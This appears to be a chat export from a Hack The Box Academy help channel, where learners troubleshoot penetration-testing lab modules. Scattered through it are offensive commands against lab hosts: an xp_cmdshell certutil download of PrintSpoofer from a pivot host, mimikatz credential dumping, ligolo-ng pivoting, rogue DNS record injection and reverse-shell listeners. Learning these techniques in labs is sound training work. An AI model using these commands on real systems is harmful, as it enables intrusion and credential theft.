#modules

That's not the right port

What do I do?

Okay thanks, I am running a full scan now. I am definetly not on right track rn.

137 is for netbios name service

Does anyone have any idea about this?

It helps to provide the module and section name

Shells and Payloads, section name shellbasics

I disabled the AV and still the powershell is getting crashed whenver I put in the revshell script.

Does this place have a season 8 discussion?

Please does anybody know why the internal hosts of the password attack's skill assessment are refusing connection? Even the Nmap scans keep on returning nothing other than the ports are filtered!

silly question. On this module am I supposed to try to ssh into whats given in the example or what? i dont understand, my prehistoric brain aint regestering it.

Have you found it?

No i'm still looking

DM me so I can save you from the unnecessary stress!

Please anybody who can help with this one?

filtered != closed

the latest 2 active boxes have their own dedicated channels; as well as #boxes exists; you'll need to link your htb account followingthe instructions found in #welcome

Alright! Thanks!

Hey im on the last question of the AEN- Web enumeration. I have my GET request to start socat shell, and my nc listener on attack hosts picks up connection but never connects. It eventually just times out on Burpsuit. Any suggestions?

wdym by "never connects"? do you not get any output from attempting something like ls?

it just stays on "listening on [any] 4444 ...
connect to [10.10.15.98] from (UNKNOWN) [10.129.229.147] 60678"

also be careful of spoiling stuff from AEN [you haven't yet] but the module is one big walktrhough. If youwant to test your methodology/readiness for CPTS I suggest doing the remainder of the module blind

yeah and in nc did you try running any commands?

OMG lol

it's taking years to scan full UDP 🥲

ok. I was waiting before. I even typed space like when you have to connect to powershell in metasploit and sometimes have to use spacebar to open shell. lol. Anywas thanks @fathom pendant

yeah udp scans tend to take a lot longer since they don't do typical handshake stuff like tcp

when you say "blind" you just mean not posting here right? blind still means i can use notes

blind means not reading the questions or the module

just going until you reach the highest privileges in the domain

then returning and answering questions

A registry entry is made up of two pieces, a 'Key' and ' ' . What is the second piece?

apparently "value" isn't the answer

Hello guys, I'm doing "Exploiting Web Vulnerabilities in Thick-Client Applications" module
When running the command javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/gui/ClientGuiTest.java to compile the given file, it gives many errors related to the compilation process. I'm following the exercise, any suggestion?

@fathom pendant I didn't got my problem solved, could you please do it

if you have any idea about this.

Hello guys. could someone help me with some questions from the Password Attacks Skill Assessment lab?

If you don’t figure it out give me a DM I’ll explain it

Sent

Hey I'm stuck on the exact same spot. Did you ever figure this out?

sure shoot me a pm

Yes, I had retrieved the wrong tickets—I was using the old session instead of the new one. Just make sure you're using the correct session to get the right ticket

Hello there, someone out there did the Skill Assessment of Blind SQL Injection module?
Which DB i need to get the tables?
Is a time based SQLI that is taking so much time

it's been like 2 hours since I started my UDP scan for 1-10000 ports.

😭

Section: Firewall and IDS/IPS Evasion - Hard Lab

Can I DM someone to get a second opinion for what I am doing wrong with AD enum skills assessment I

Hi! I need help on where to start

I also need help for a protection thing for my laptop..Idk how to do that

protection thing?

Section: Firewall and IDS/IPS Evasion - Hard Lab

So I ran top 10000 UDP ports scan and found some ports, but I still dk what I am missing if 137 port isnt the right track.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@urban ore ^

Hey Guys! I have been working hard in the Skill Assessment on the Password Attack module. I already got a foot on DMZ01, and I am connected to JUMP01. However, I have not been able to elevate privileges yet. Mimikatz does not work without that. Nothing usefull looking for passwords. Any suggestion? I appreciate that

Does anyone know any good modules for Linux privilege escalation and AD pentest?!

There are whole modules about linux privesc and AD.

PS. I got the flag. Had a hard time at this. (Firewall and IDS/IPS Evasion - Hard Lab)

Congratulations! @hushed furnace

I am working hard for that feeling too... I am really close

I'm trying to use the other two ip addresses that come up (ens224 and docker0) and I'm not connecting to agent after entering the start command in ligolo-ng

ligolo-ng pivot doesn't work in the

AD Enumeration & Attacks - Skills Assessment Part II
``` machine?

ligolo should work fine

I used wget and placed agent into ssh and proxy in local machine. I ran the ```
sudo ip tuntap add user whoami mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
./agent -connect localmachine:11601 -ignore-cert
Found lo/ens192 (ssh)/ens224/docker0 ips
sudo ip route add ens224 or docker0 ip (without the / part since it doesn't work) dev ligolo in different sessions
Ran the start command on either ens224 and docker0 (didn't connect after attempting to)

Probably best to ask in #1024429874246590575 or maybe #general. Ligolo isn't covered in any of the modules.

perhaps this help
https://medium.com/@redfanatic7/guide-to-pivoting-using-ligolo-ng-efd36b290f16

Thank you! :)

or this serie from our friend @gray yacht https://www.youtube.com/watch?v=de7IP_uZK6E&t=22s&ab_channel=r1ckyr3c0n

Struggling with Web Services and API Attacks, when targeting a SOAP service, am I supposed to send requests to the wsdl or is there a better endpoint that I'm supposed to send it to?

at the introduction to assembly module i found

00000000  71E6              jno 0xffffffffffffffe8
00000002  BB4850C031        mov ebx,0x31c05048
00000007  48                rex.w
00000008  4853              push rbx
0000000A  2144AF66          and [rdi+rbp*4+0x66],eax
0000000E  7E16              jng 0x26
00000010  1BB57A7C4623      sbb esi,[rbp+0x23467c7a]
00000016  A7                cmpsd
00000017  BB344D26BF        mov ebx,0xbf264d34
0000001C  BB48534C9A        mov ebx,0x9a4c5348
00000021  BB48534377        mov ebx,0x77435348
00000026  B64B              mov dh,0x4b
00000028  53                push rbx
00000029  1271E7            adc dh,[rcx-0x19]
0000002C  2036              and [rsi],dh
0000002E  63                db 0x63
0000002F  10D2              adc dl,dl
00000031  144D              adc al,0x4d
00000033  21444D2B          and [rbp+rcx*2+0x2b],eax
00000037  B480              mov ah,0x80
00000039  4C180C93          o64 sbb [rbx+rdx*4],r9b
0000003D  1482              adc al,0x82
0000003F  1448              adc al,0x48
00000041  3481              xor al,0x81
00000043  F3148E            rep adc al,0x8e
00000046  7894              js 0xffffffffffffffdc
00000048  8B0C03            mov ecx,[rbx+rax]
0000004B  148F              adc al,0x8f
0000004D  7E20              jng 0x6f
0000004F  8C74801B          mov [rax+rax*4+0x1b],segr6
00000053  740F              jz 0x64
00000055  F31480            rep adc al,0x80
00000058  1D23148E68        sbb eax,0x688e1423
0000005D  94                xchg eax,esp
0000005E  8F                db 0x8f
0000005F  63                db 0x63
00000060  148C              adc al,0x8c
00000062  031480            add edx,[rax+rax*4]
00000065  50                push rax
00000066  F1                int1
00000067  EB20              jmp short 0x89
00000069  50                push rax
0000006A  FFF3              push rbx
0000006C  1483              adc al,0x83
0000006E  CC                int3
0000006F  08                db 0x08

what do i do next

Anyone completed the 'Web Services and API Attacks' module that could spare a few minutes to help me understand this better?

where is the flag located? does it just print the flag or does it save a file

I have my ligolo-ng stuff saved in another doc for a different time. I'll figure it out later.

i'd just like objdump or binwalk that tbh

In

AD Enumeration & Attacks - Skills Assessment Part II
 Submit the contents of the C:\flag.txt file on MS01.

Did you use x11 forwarding for xrdp?

yeah but they didnt print any stuff

idk how im supposed to approach it, i tried online assemblers and stuff

but i still cant find the flag

sorry was trying to look up that jno instr

can someone please help me with this error? The port is open, as per nmap. And I already added the entries on /etc/hosts
user@kali:~/Documents/src/krbrelayx$ python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rosa -p xxxxxxxx -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.15.89 --action add 10.129.1.207 [-] Connecting to host... [-] Binding to host Traceback (most recent call last): File "/home/user/Documents/src/krbrelayx/dnstool.py", line 615, in <module> main() File "/home/user/Documents/src/krbrelayx/dnstool.py", line 431, in main if not c.bind(): ^^^^^^^^ File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 589, in bind self.open(read_server_info=False) File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 57, in open BaseStrategy.open(self, reset_usage, read_server_info) File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 146, in open raise exception_history[0][0] ldap3.core.exceptions.LDAPSocketOpenError: socket connection error while opening: [Errno 113] No route to host

Hi. I am facing exact same error. Can I please DM you? I followed your steps but the error stil persists .

The error says no route to host. Network problem.

I know, but there is a route

is pingable

And I added the entries into /etc/hosts

I also tried adding DC01, still same error

not sure if it is an issue with the VPN and HTB platform cannot reach back to my tun0

can you please tell me where the problem is or what to do?

double check all network configs to make sure you can reach the target, hostname, etc

I think I am not using the right IPs. Can you please clarify the following? the "-d" is to specify my own Kali IP and the "--action add" is to specify the Domain Controller's IP?

Or....
The "-d" is for the DC's IP and the 2nd IP, is tun0 or Kali?

sorry cant check rn busy. all i know is the error said no route to host so something related to network

Hello everyone. I'm stuck on the question in the "Race Conditions" section of the "Whitebox Attacks" module. I believe the vulnerability is in the "buy_product" function, since by running the application locally, I've managed to make two simultaneous requests using the last-byte synchronization technique, successfully purchasing two $10 gift cards with a $10 balance. However, I haven't been successful in exploiting the vulnerability in the target web application I've been given. Can someone please give me a clue?

what commands u guys usually use (for nmap) to scan all ports (faster)?
coz my nmap taking 40 mins to scan all ports of AEN first target : )
command used : nmap ip -p- -T4 -oA allports -n

nmap -p- -Pn -n --open [ip]

Once I get the open ports.... I dig deeper with -sCV

I use this bash script to make the 2nd part faster: https://gist.github.com/anibalardid/5e05b6472feb3d31116729dc24e6d3e2

found the problem .... HTB command syntax is actually old. The flags are now different.

So I am having trouble with the subdomain bruteforcing module, I keep getting flagged by google and am getting an error when trying to use dnsenum.

best to say which module and section you're on. google shouldn't play a role at all.

Gonna sleep but I was wondering if anyone can point out which IP do I use for sudo ip route add <ip here> dev ligolo

#1399214044153511986 message

@cloud urchin

Scraping inlanefreight.com subdomains from Google:

Error GETing http://www.google.com/sorry/index?continue=http://www.google.com/search%3Fhl%3Den%26source%3Dhp%26q%3D-www%2Bsite%253Ainlanefreight.com%26iflsig%3DAOw8s4IAAAAAaIcSZAoXfhz4WvXrqnSnXOZGLH0oJcfB%26gbv%3D1&hl=en&q=EgSVZvJnGNWInMQGIjCIJ_uiJYh5EnQHOoasMD0tlckSxixnJu7XSri1o4tv97yFRuHKR7TZAl9tqizuljAyAnJSWgFD: Too Many Requests at /usr/bin/dnsenum line 969.

information gathering - web edition / subdomain bruteforcing

yeah you're not doing something right. you're not supposed to brute force google.

use the command like it's shown in the section

dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

weird yeah mine doesn't do that maybe make sure it's up to date or something idk. i have 1.3.1

This is the command I am using, I have sliver and am seeing that It does show that there are google results as well in the solution

Im 1.3.1 as well

yeah no idea. mine just says google probably blocking me

and it moves on

hmm

Mine keeps throwing an error, I'm using a VPN on to of OpenVPN might that do it?

Are you sure you mean .com and not .htb?

You are currently hammering against your resolver, which presumably limits the number of requests

Executing the shellcode just gives me a shell that instantly crashes or no shell at all

So inlanefreight.htb not .com?

Take a look at the task. It tells you which domain you should attack

Ya idk I keep getting an error, just read the github and apprently there was an issue with google scraping in 1.2.2

Really pay attention to the domain you are attacking. If I remember correctly, every task with DNS was with a .htb domain and not .com

I'm 99% its .com

"Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com."

From the solution -

"Students need to use the dnsenum tool, supplying the subdomains-top1million-20000.txt wordlist from SecLists to bruteforce the subdomains of inlanefreight.com:"

If it says so in the task, then that is correct. However, make sure that your resolver does not limit the number of requests.

thanks its pretty faster than my command : D

why cant i type @ general

Read #rules and then #welcome

Did you ever figure this out? I can help if needed

Just DM me if you need help still

Hey @everyone, having trouble getting my Kali Linux to connect to Wi-Fi. My ping ## command shows 'Destination Host Unreachable' and 100% packet loss. Any ideas on what to check next? I'm running Kali in VMware. please help

Hey everyone! I have some doubts with Mass IDOR Enumeration module in Web Attacks. The url is supposed to show the uid parameters? Because is not my case, and I tried using the script described in the module and is not giving any results for the 20 first users.

Hey I just joined but I need sum help

Hi everyone, I'm new here ...an aspiring pen tester and CEH...your knowledge to go through the journey is really needed here

Hi please just ask your question instead of just saying I need help that doesn't really narrow it down.

@shy pike @flint folio @wild moss this channel is for #modules related questions only please read #rules and follow #welcome to gain access to other channels such as #general

Thanks

Thanks

need help in android static analysis module

under the subsection reversing hybrid apps
got the needed key but the unable to login, please help

Are you connected to a VPN?

No

The problem lies here

You need to download the VPN first, then connect to the VPN in Kali.

Hi all, seems I am stuck at this question in the "Android Fundamentals" module

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I have created the AVD as specified and started it, it's working fine, I can obtained the information needed from the settings application, but I dont get it correct on submission, any help would be of importance to me, thank you

i got debug key but unable to use it in curl, it says invalid key

Downloading the VPN is not the problem, The huge problem is that I can not do anything in Kali linux, even opening/searching the HTB course

No network?

yes, no network

I mean my computer is connected to the Wi-Fi, its just the Machine that is not

Could someone help me with last part of Intro to Whitebox Pentesting? I don't understand where I get the flag after submitting to /patch

You can ask chatgpt, maybe it will give a better answer

not fully completed but which section you need help bro

Chatgpt failed me

anyone having issues with xfreerdp today on htb vpn?

I can't connect to the hosts at all, just hangs on black. 15 minutes I've been waiting since deploying the target & ive redeployed this is the second set of 15 minutes of waiting.

Any ideas?

I'm on Credentialed Enumeration - from Windows of Active Directory Enumeration & Attacks module.

Seems the lab from task just before this also not allowing the connection through:

Internal Password Spraying - From Windows

seems its about 2-3 minutes of waiting on black now and get this message in error logs.

Press enter

Really that simple? 😄 thanks man

if that doesn't work swap to rdesktop

Nope it totally worked, gonna go facepalm why I waited half an hour before asking

⬆️ Please I need help, I've been stuck on this question for almost 4 days.

I suggest you check your VM's network settings in VMWare/Virtualbox, whichever program you are using. You may also want to check if the routes are correct on your Kali machine and if the interfaces are up etc. Doing a traceroute may also give you a hint on where the problem is occurring

Hey, please DM to not spoil for others

Any one know how to solve file transfer module i stuck at second question where i need to upload a zip file in target machine but the credentials are incorrect

Good Morning All, jumping in here as I start the Exploit stage of AEN. Wish me luck!

Gooodluck Frost!

Could really use a hint why I dont get the flag in Intro to Whitebox Pentesting skills assessment 2 when my code doesnt have any injection vulnerabillities. To anyone getting stuck here, you need to write the throws OUTSIDE of the generatePassword function.

@digital pendant THANKS! I have been stuck in this spot for like a week, so really hoping to tear past it

You'll smash it

Guys hello Has anyone who is here now done WPA2 attacks module?

I can't run air-hammer

Anyone have advice on module boxes, especially ones with pivoting and such, and how to make them load faster? I am port forwarding to see the web application but its not fully loading so I can't access a page

Any one can help me in Sherlock hard lab streamer

#sherlocks, if you don't have access read and follow #welcome

Hey folks, how you all doin.
Just want to get answer quickly. On htb question; What RFC specifies private ip ranges ?
I believe i entered correct answer but for some reason htb saying incorrect answer. It pissed me off. Thanks for your answer in advanced.

Could you please also include the module and section that this question is from, just so people can easily help you if they've done the module
-# I have not done that module so I am unable to provide an answer, please be patient and someone will help you if/when they can

Module name Network foundation section Network address translation

Who in here can hack ?

Wtf

Not me thats for sure

attacking common services found the credentials tried to login to phpmyadmin but nothing is on the webpage

Go find your mama

🤨

why what for?

Hey, can anyone give help with a sanity check for the skill assessment in the TLS attack module? I found the attack vector but keep getting errors

My account

@chrome vortex we can't help you

this is not a hacker for hire

Well damn

contact support

Htb is likely robbing us folks. Need to laid down the money before it lead you to the answer.

dont make false statements @rain garnet

can any1 help

what section is this

easy skill assessment

what module/section?

send me a dm with everything you got

Yes, it's true. I've got proof. The step-by-step solutions toggle is disabled, and when you try to turn it on, it won't let you. There's also that circle with the exclamation mark. If you click it, it says "Click here for an answer," but you gotta pay for a subscription first. Seriously? Mtf

Well, yes, solutions are only included with yearly plans

You can always ask for help here

Well F that.. i already subscribed before. I dont wanna waste my money.

But if you don't specify which section and module you're on - not many people will go looking themselves

sent a friedn request

accepted @haughty fiber

This module and section @storm elk

Have you tried copy/pasting the answer as is mentioned on the page?

This works fine for me

RFC xxxx

yo so i am on the era machine right now i found the user.txt flag already but the website dosent accept it who can help me

Ill give that i try.

??

#1398707252629733436 - if yo ucant access this channel >> read and follow #welcome

and be patient @uncut zenith

Wtf xxxx is your answer, do you understand the question?

xxxx is not my answer

okay

Try to make sure there are no spaces in front or after

Issue resolved 🙂

for https://academy.hackthebox.com/module/20/section/226, i cracked the .cap file but it's not accepting the password as the answer. What do i enter? The question is 'Perform MIC cracking using the attached .cap file.', as you can see, it does not specifically ask for anything, just says to do mic cracking.

Anyone have WiFi material

When it says a module will take x days in the academy, how many hours is it talking about? 12, 24?

How many hours in a HTBA day?

8 hour days iirc

Sounds right. Had me panicking about the footprinting module taking "2 days"

Hi wanted to check one thing with the you all regarding windows evasion techniques module

I'm not sure why the flag is not being generated after placing properly made executable as mentioned in the question in the specified folder

When I read logs I'm seeing message like
Checking
Filename - ok - undetected by Microsoft Defender
Not sure if the check passed still why the flag is not being generated

hey I am doing web attacks skill assessment and the target is very slow, it takes nearly 40_50 seconds to refresh the page and my internet is not bad

Good morning everyone! 🙂

I'm doing the skill assessment for the Network Foundations module and I'm trying to login to the FTP service of my target machine via netcat
I ran the command "nc (target IP) 21" and got the welcome banner for the service like it says I should
The issue I'm having is that when I enter "USER anonymous" as directed I get the response "451 The parameter is incorrect." instead of "331 Anonymous access allowed"

Not sure if I'm entering it wrong but it looks like I followed the directions. Any ideas?

Give me the URL

10.129.233.197

Which module

Network Foundations

you can DM me if you still need help with this

USER anonymous[Ctrl+V][Enter][Enter]

I tried that and it didn't work 😅 it wont let me hit enter twice without returning the error message. It only lets me hit enter once and then I get the "Parameter si incorrect" message

Just like this

so I put an ^M after anonymous before I hit enter?

^M should be typed using [Ctrl+V][Enter][Enter]

Ohhhhhhhhhhhhhhh I misunderstood what the [Ctrl+V][Enter][Enter] was meant to do. I thought it was Ctrl+V to paste the user info and then try to hit enter twice lol I'm an idiot 😅

Thank you for the help!

No big deal — hitting a few bumps is just part of growing. We all have our “I’m such an idiot” moments, trust me.

That's true haha I'm brand new to all of this but I'm loving every second of it

In AD Enumeration & Attacks - Skills Assessment Part II
Am I able to access 172.16.7.50 xfreerdp from 172.16.7.240/23 ips? If so, I am unable to add the route for pivot using the sudo ip route add 172.16.7.0/23 dev ligolo with a Error: Invalid prefix for given prefix length. message but for some reason docker sudo ip route 172.17.0.0/16 dev ligolo but I am not able to xfreerdp to 172.16.7.50 from that pivot

I don't mind helping to troubleshoot this, you can DM if you'd like.

They fixed it!

hello, need help in AD enumeration and attacks

Hi mate, any chance you can tell me how you fixed the problem? I seem to be having the same issue as you mention and I can't escalate past user2 or get past the password request for the ssh. I must be doing something wrong but I have no idea what.

hi, could i get a nudge for windows lateral movement skills assesment on moving laterally to WSUS?
thanks!

I'd look over that document you likely identified earlier and see if there is anything specific about that host. Then it's all about whatever creds you have.

managed to get it to work albeit laggy, was just missing something stupid thanks!

How many functions can be exploited with the "nano" binary based on GTFObins?
https://academy.hackthebox.com/module/296/section/3398

I ran linpeas, what do i do?

nvm got it

Please pass on my thanks to whoever authored "AI Red Teaming" course. Its wonderfully written and very clearly explained the hard to understand and visualize mathematical terms

I would recommend this certification to be aligned with Mitre Atlas framework (https://atlas.mitre.org/matrices/ATLAS) and have modules associated with TTPs from this framework. This would be real AI red teaming

Probably best to submit feedback via /feedback

thanks

How to move a file from host os to target os via rdp

In file transfer module

mount the drive

Copy/paste?

xfreerdp can do this

Copy paste does not work

how to copy paste using xfreerdp?

rdp also has the option to enable "share folder" and then copy paste

Then mounting a drive could work

Ok

yes that should work def, check the /drive switch for the xfreerdp command

In rdp can we mount th drive

hi does anyone know how to do this question; Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes) Intro to Assembly Language module am stuck

did they mistake this with "linpeas.sh" ?
https://academy.hackthebox.com/module/296/section/3399

Might wanna report this to #1234357888114364508 , I do think you’re right

nvm

Struggling with "Web Services and API Attacks", trying to form a valid Login Request and I keep getting this error:

This is the script I'm using: `PAYLOAD='<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<Login xmlns="http://tempuri.org/"><username>test</username><password>test</password></Login></soap:Body></soap:Envelope>'

HEADER="SOAPAction: Login"

echo $HEADER;

curl -X POST
-d $PAYLOAD
-H $HEADER
"http://:3002$1/wsdl" `

What obvious thing am I doing wrong?

Yeah cause i been searching for that file for an hour now

and hasnt been anywhere

hey, for "password attacks" - "As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?"
i can't seem to find the password, tried multiple tools, even mounted the shares and used grep, with a lot of filters
can i get a nudge on this please?

Nxc can help with the pattern option

the problem is not the tools, but the filter itself

I don't recall too much difficulty

i searched for all combinations of "password", "pass", "passwd", ..., domain name, user, admin, domain etc

i found like 7 passwords but they don't work

idk what to search for anymore, mind at least telling me the share? i tried the ones the new user has access to

Sec ill see what pattern I used

As a note you authenticated with the user:pass from the first q?

yup

did you capitalize 'admin'?

yeah i even mounted the shares and used grep -ri

was it "Admin"? maybe i missed it

or the full word

oh okay will try it out, thank you so much

hi! i rebuilt my kali linux box and i can not use klist, it says it's not installed. What app can i install to make it work again?

i need it for pass the certificate

krb5-user

^

nice! thanks

always walk backwards from what you need;

• need klist
• what does klist do
• what might be required that klist does
• (GOOGLE)

Just finished the password attacks module, what a grind 😅 learned a lot!

unfortunately it didn't find anything with Admin :/
is it in one of the shares the previous user did not have access to? (Finance, Sales, Marketing)

try the full word

i mean if it can't find Admin it won't find Administrator as well

do you remember which share it was in?

@muted blade the password doesn't necessarily "need to work" just paste it into the answer field

make sure no extra spaces

yeah i was referring to the answer field, it doesn't work

ah forgot a symbol

yeah it worked now, thanks

Having trouble with:

AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

When running xp_cmdshell certutil -urlcache -split -f "http://172.16.7.240:8000/PrintSpoofer64.exe" c:\windows\temp\PrintSpoofer64.exe output I either get ```CertUtil: -URLCache command FAILED: 0x80190194 (-2145844844 HTTP_E_STATUS_NOT_FOUND)

CertUtil: Not found (404). orCertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)

CertUtil: A connection with the server could not be established``` Do I need to leave my ligolo pivot to solve this problem?

hey quick question, if I have a reverse shell meterpreter session, why would i need to use proxychains?

ur question is not clear

u would use a proxychain if you cannot access the internal network

ok to clarify if i already have root ssh access and ive established reverse shell on my attack host, why would i want to use proxychains? cant i just do everything i would with proxychaines in my metasploit reverse shell meterpreter session?

what proxychains does is it chains the connections of the proxy server/clients

Expected. If you look at the hybrid code one more time, you're missing one piece of information when constructing the http request
/endpoint?var=val is GET;

proxychains is basically "hey i have access, but i'd like to dive deeper"

u can't nmap for example

meterpreter is limited

though ligolo-ng is better overall as a pivoting tool over anything using proxychains

oh i thout there would have been a scanner on metasploit i can use if i background the meterpreter session

i generally don't use meterpreter all too much tbh so i'm not all too familiar with its routing

plus maybe u have tools on ur attack host that u want to execute on the target machine, and that would only work with a pivot

ahh okay

or finding/compiling a compatible binary to drop on the host/target

i mean yeah but it's a bit of a workaround and nmap offers more flexability

yes exactly

yeah because i know i can do a host discovery through metasploit, but i guess you are right maybe an nmap provides more information

i ask because i really havent used metasploit enough but from my expereince and understanding, it pretty can do most of what other tools can as an all in-one. Can you give me examples of common tools/exploits that metasploit cant do ?

like common linux tools that you use locally that cannot be replicated in metasploit? which ones?

throughout ur studying ull have to download tens if not hundreds of tools from github or the internal in general, these tools will not be found in msfconsole

plus as an advice, u should always know that learning the manual steps is far more beneficial than just relying on automation

at least in the learning process

for sure

yes metasploit is very beneficial and cuts time but it is limited it doesn't have every tool in the world

Hi everyone, I'm stuck in the first phase of the "Skills Assessment" section of the "WhiteBox Attacks" module, as I've tried to bypass authentication using "Type Juggling" and the username "Larry" with several wordlists, but I haven't been successful. Could someone please give me a clue?

Hello can someone assist me

Im at https://academy.hackthebox.com/module/58/section/526 I found the first flag even, but when I enter in the little textbox it says it's incorrect. Idek what I am doing wrong cus everything seems right i got the flag but it shows it's wrong

https://academy.hackthebox.com/module/296/section/3401

the hostname in the crackmap output isnt the hostname apparently

I need help in the skill assessment "Injection Attacks" Module

Hey can I dm someone that has solved the advanced xss module - skill assessment? I am able to get the data from the api

Why the hell are there two different kinds of subscriptions, one for academy and one for boxes? I paid for the academy one and i would expect to be allowed to use pwnbox with unlimited time for boxes too

Two different products

1 single company. That's why.

Well atleast i would expect unlimited pwnbox in both for that price

why

its expensive, and if i already get it i dont really see why it should be seperated

If you are a student, Academy is 8 dollars

well im not

I don't find that expensive. Having said that. Expensive is also relative. The concept changes depending of which country you are and what do you do.

Anyway, this is the Module channel. I suggest talking about that in general maybe?

cant talk in general

Hey everyone, I'm having a hard time with the Applications of AI in Infosec skills assessment. I figure using the multinomial naive bayes for text classification, like with the spam classifier, is the way to go.

I'm at the part where I'm trying to find the optimal parameter for classification and I'm getting an error that looks like it has to do with the test variables.

Can anyone help me out with this?

Either way, what pisses me off is that even with unlimited pwnbox in academy, if i use it once in academy and then go over to do a box, i have used my pwnbox time for the day even though i did not use it in the boxes section

Hello ppl this is krypton , i am a newbie looking for some help

I start networking fundamentals and it is going all over me head, what should i do? any suggestions for other good resources or should i just skip it and do another module?

hey can anyone tell me where to get static nmap version?

Start with the InfoSec module, thats the best thing to do, it doesn't overwhelm you with that much numbers, and its very fundamental, and then you can go back to the networking module. If you have already done the "Introduction to InfoSec", then you could probably do the introduction to linux module first

Im pretty new too, so take it with a grain of salt

Go to #welcome and follow the provided steps to get access to more channels.

hi. I’m working on Windows Lateral Movement module. I’m on the Skills Assesment. Would like to ask a clarifying question about the second flag if anybody would be willing to give me a pointer. Thanks 🙂

photo from module?

talk in DM?

yes

talk me

Good night! Please help me, I can't find the password in question 1.
https://academy.hackthebox.com/module/147/section/1334

Some easy host based enumeration that leads you to something you can read should get some information to check out.

is it alright if I send you a DM?

Yeah that's fine

In

AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I'm trying to run https://github.com/ParrotSec/mimikatz/tree/master/Win32 version in mimikatz in the msfconsole windows shell but I keep getting this

This version of C:\mimikatz.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

message even though the service is running in

C:\Windows\system32

Try from the official repository or the one from the module

Yo

Tysm

In AD Enumeration & Attacks - Skills Assessment Part II Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I'm getting an error when running

sekurlsa::logonpasswords

ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

oh shoot I forgot to do the pid thing

I am mega stuck on this questions: Try to bypass the client-side file type validations in the above exercise, then upload a web shell to read /flag.txt

I am in the file upload attacks section (client-side validation) I have followed the instructions to a T and nothing is working.

Didn't fix it

Hi everyone, I'm stuck in the first phase of the "Skills Assessment" section of the "WhiteBox Attacks" module, as I've tried to bypass authentication using "Type Juggling" and the username "Larry" with several wordlists, but I haven't been successful. Could someone please give me a clue?

Hey guys is there a mod here?

I wanna give u some information on a person using this server as a bait to text people offering hacking services and scamming them and I’d like to report it as this is against the rules

Are they in this server? If not, there's not a whole lot we can do.

If they have a website /spoiler (click the one that says "hackster")

some guy appears periodically and puts some phishing links I have seen him

Looks like there are NaN values in your label column. You may want to fill those NaN with fillna function of dataframe

Hey folks / Mods ... how common is Unconstrained Delegation - Users?

I honestly never seen that at work.

I finished the section. But I was puzzled to find this, to be honest.

It actually happens relatively frequently, you don't need a mod/admin to tell you that though

That's more a q for people that work in the field

Why do I get this error when the target system is windows 32

Read the error more carefully

You're using a 32bit binary to try and access a 64bit program

In other words: an impossible situation

x64 can read x32, but x32(x86) cannot read x64

I'll use 64 version.

My errors are so simple looking back.

I'll lyk if it works. Taking an eating break.

they r yeah

Take a look at the code, there's a piece of information needed to construct a http request.

Build number can be viewed in the Settings.

Build number can be viewed in the Settings of the AVD.

Thanks! I'll have to look into that tomorrow. My internet is currently down.

ok dm me the details then

apparenly they left

alright not a lot i can do then

Isn't this right?

edition

Thanks

Try not tp spoil modules above t0

How do I solve the problem

I'm trying to do a thing with crackmapexec in the deleted post but I'm getting the status_logon_failure error

That means the logon was not successful

The main issue is that the module solution has those credentials as the main login.

oh idk i didn't use the solution

probably a mistake or something

Probably. The main way still works.

Try not tp spoil modules above t0

Is anyone able to access the target machine in CPTS Module Password Attacks: Attacking Windows Credential Manager. I'm unable to access, ping, or RDP into the target machine for this specific module. This issue seems to be isolated to this module, as I am able to access the target machines in other modules without any difficulty.

It’s not about rdp..do something else run nmap there are many ports

There is a switch in nmap which doesn’t need pinging and also if issue still persist reset the machine or download new vpn config tcp one

Hi, I'm with the Wi-Fi Penetration Testing Basics module, and at the Bypassing Mac Filtering section I have a problem. The second question requests connecting to 5G network, but I can't. I have bypassed the MAC filtering, but it prompts for a password. There isn't any wordlist or something like that in this machine, so I can't make a dictionary attack to gather the WPA2 key. Is there any problem with that? Has anyone resolved it?

Is there a maintained version of PowerSploit/PowerView ?

No

😔

Don't think so

Thanks anyways

NetExec took over CrackMapExec so I was hoping something similar here

guys there a problem with the module
https://academy.hackthebox.com/module/296/section/3403

i copied the first line of the file i found and it's not the correct answer

Re-read the section again. It tells you the password.

SuperNuts, may you help me out? The module is super easy but it doesn't seem like it gives me answer to submit it in. The whole literal line 1 of the file was copied and it doesnt work when i put it in

just post in here and someone may help

#modules message

Pinned comment

is this fine to send? im njot sure if it spoils it really

but it doesn't work

i haven't done that module so idk

actually it does spoil it

that's a tier 0 module

Oh it is?

which means you can post stuff about it

o okay perfect

https://academy.hackthebox.com/module/296/section/3403
Module: Pentest in a Nutshell
Section: Windows Vulnerability Assessment
Question: What is the content of the first line in the healthcheck.log file on the Windows target?

apparently what i got isnt the answer

look at the very first line of the section

i looked at the first line

no, on the page you're learning from. go over the section again.

